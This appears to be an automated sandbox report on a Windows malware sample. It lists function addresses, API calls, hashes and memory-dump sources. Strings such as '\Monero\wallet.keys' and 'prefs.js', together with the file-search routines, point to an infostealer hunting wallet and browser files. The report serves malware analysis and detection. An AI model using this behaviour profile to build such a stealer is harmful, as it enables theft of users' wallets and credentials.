                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00694580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00694587
                              • wsprintfA.USER32 ref: 006945A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 006945BD
                              • StrCmpCA.SHLWAPI(?,006A0FC4), ref: 006945EB
                              • StrCmpCA.SHLWAPI(?,006A0FC8), ref: 00694601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0069468B
                              • FindClose.KERNEL32(000000FF), ref: 006946A0
                              • lstrcat.KERNEL32(?,0148E848), ref: 006946C5
                              • lstrcat.KERNEL32(?,0148DA40), ref: 006946D8
                              • lstrlen.KERNEL32(?), ref: 006946E5
                              • lstrlen.KERNEL32(?), ref: 006946F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 3d7351b8f0803406705d14128c1727d51688b41c3b1b8b1bbc744cba8065dcfd
                              • Instruction ID: c6b91625debfb2830a9a7990ccbcb1ccf4af48b1a25618ae5ece774eb695e75e
                              • Opcode Fuzzy Hash: 3d7351b8f0803406705d14128c1727d51688b41c3b1b8b1bbc744cba8065dcfd
                              • Instruction Fuzzy Hash: 7F5153B190021CAFCB64EBB0DC89FE9737DBB58304F404598F64996190EF759B858FA2
                              Function 00693EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00693EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00693EDA
                              • StrCmpCA.SHLWAPI(?,006A0FAC), ref: 00693F08
                              • StrCmpCA.SHLWAPI(?,006A0FB0), ref: 00693F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0069406C
                              • FindClose.KERNEL32(000000FF), ref: 00694081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: ce715a5ef81cb4a2634684fe95228f02fe91160028b7274a9921a74719031d4f
                              • Instruction ID: 68bebdad48561e918c3516fb6c1c47a0b03ae3b0a3cd90fcae18f1bf441d0325
                              • Opcode Fuzzy Hash: ce715a5ef81cb4a2634684fe95228f02fe91160028b7274a9921a74719031d4f
                              • Instruction Fuzzy Hash: ED5154B2900218AFCF24FBB0DC85EEA737DBB44304F00459CB65996140EB759B868F95
                              Function 0068ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0068ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0068ED55
                              • StrCmpCA.SHLWAPI(?,006A1538), ref: 0068EDAB
                              • StrCmpCA.SHLWAPI(?,006A153C), ref: 0068EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0068F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: e5ecc11ffa6ab2c8ff5bba05dfe4643207672dba11c1be2dd30eb6eb72e93c93
                              • Instruction ID: 7ec0505d578a628fd99a90c892ebf4b41794f6dc4735573eb5edc745c2fc6655
                              • Opcode Fuzzy Hash: e5ecc11ffa6ab2c8ff5bba05dfe4643207672dba11c1be2dd30eb6eb72e93c93
                              • Instruction Fuzzy Hash: 0AE1F4719211189ADF94FBA0CD52EEE737EAF54300F40419DB50A66492EF306F8ACF96
                              Function 0068F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A15B8,006A0D96), ref: 0068F71E
                              • StrCmpCA.SHLWAPI(?,006A15BC), ref: 0068F76F
                              • StrCmpCA.SHLWAPI(?,006A15C0), ref: 0068F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0068FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: a4af25c3c67c405287bddf11c2dfa52b9740d175dcb501c6457d8a1d11698648
                              • Instruction ID: 021593f021a61d71e557ff09b409c22fb31e927ab00fb4b9c7473a6f00cb5716
                              • Opcode Fuzzy Hash: a4af25c3c67c405287bddf11c2dfa52b9740d175dcb501c6457d8a1d11698648
                              • Instruction Fuzzy Hash: BBB132719101189BDF64FBA0DD56AED73BEAF54300F4086ACA40A9A541EF306B49CFD6
                              Function 006816D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A510C,?,?,?,006A51B4,?,?,00000000,?,00000000), ref: 00681923
                              • StrCmpCA.SHLWAPI(?,006A525C), ref: 00681973
                              • StrCmpCA.SHLWAPI(?,006A5304), ref: 00681989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00681D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00681DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00681E20
                              • FindClose.KERNEL32(000000FF), ref: 00681E32
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: cb6631caf2b846da3fdc980ac8c66782e9073ab779c150603b5b179b445cf4a2
                              • Instruction ID: dd5abab29a256707da7e3d01b0d806f1a0b2d88a2566d3903675d3c9eb215ac1
                              • Opcode Fuzzy Hash: cb6631caf2b846da3fdc980ac8c66782e9073ab779c150603b5b179b445cf4a2
                              • Instruction Fuzzy Hash: B5122E719211189BCF59FBA0CD96AEE73BEAF14300F40419DA50A66491EF306F8ACFD5
                              Function 0068DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006A0C2E), ref: 0068DE5E
                              • StrCmpCA.SHLWAPI(?,006A14C8), ref: 0068DEAE
                              • StrCmpCA.SHLWAPI(?,006A14CC), ref: 0068DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0068E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 27be54cd596a04bf5d78b3720b56190260bae21bee2d7fa1c0df762fd046d4a5
                              • Instruction ID: a064995e11bd5dcad4dca91cc9772bf8e2f66b664f196283bacb1ed496496c92
                              • Opcode Fuzzy Hash: 27be54cd596a04bf5d78b3720b56190260bae21bee2d7fa1c0df762fd046d4a5
                              • Instruction Fuzzy Hash: A2F19E718201289ADF59FBA0CD95EEE73BEBF15300F40419DA40A66491EF306F4ACFA5
                              Function 0068DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A14B0,006A0C2A), ref: 0068DAEB
                              • StrCmpCA.SHLWAPI(?,006A14B4), ref: 0068DB33
                              • StrCmpCA.SHLWAPI(?,006A14B8), ref: 0068DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0068DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0068DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 433a8be4990543e0293c4f55639242e6fe8223f37f1bfbd6e7803fd38c0e559f
                              • Instruction ID: 1885f702fde1be2ad21e59c5c9d8e0cb1d97975ab39737c25087decee4ae7074
                              • Opcode Fuzzy Hash: 433a8be4990543e0293c4f55639242e6fe8223f37f1bfbd6e7803fd38c0e559f
                              • Instruction Fuzzy Hash: 9B91247691010897CF54FBF0ED56DED73BEAB84304F40865CF90A9A581EE349B098BE6
                              Function 00697B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,006A05AF), ref: 00697BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00697BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00697C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00697C62
                              • LocalFree.KERNEL32(00000000), ref: 00697D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: f2e8da10a320f7758b08bafbb040c12d5f01138541f0c4a651e4727cbbb318bb
                              • Instruction ID: 24adfabde122e360de14caccf88316785634ff75ce80814485fccab7ed03b875
                              • Opcode Fuzzy Hash: f2e8da10a320f7758b08bafbb040c12d5f01138541f0c4a651e4727cbbb318bb
                              • Instruction Fuzzy Hash: A9416C71911218ABDF24DB94DC99FEEB3B9FF44700F204199E00962680DB342F86CFA5
                              Function 00A4A8BB Relevance: 10.4, Strings: 7, Instructions: 1649COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !\K[$%\K[$3Afv$5~u$?k}?$v>v}$`QP
                              • API String ID: 0-2883981944
                              • Opcode ID: 92415575f6d2ae4c253f5c5d5115dac083ded847b47c8f91f9c338647531e6f3
                              • Instruction ID: 47c11132d97b80d5bf6aa092d05761b5896a37bda55f36745b8d2e2598ec9486
                              • Opcode Fuzzy Hash: 92415575f6d2ae4c253f5c5d5115dac083ded847b47c8f91f9c338647531e6f3
                              • Instruction Fuzzy Hash: F4B228F3A082049FE3046E2DEC8577ABBE5EFD4720F1A453DE6C4C7744EA3598018696
                              Function 0068E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006A0D73), ref: 0068E4A2
                              • StrCmpCA.SHLWAPI(?,006A14F8), ref: 0068E4F2
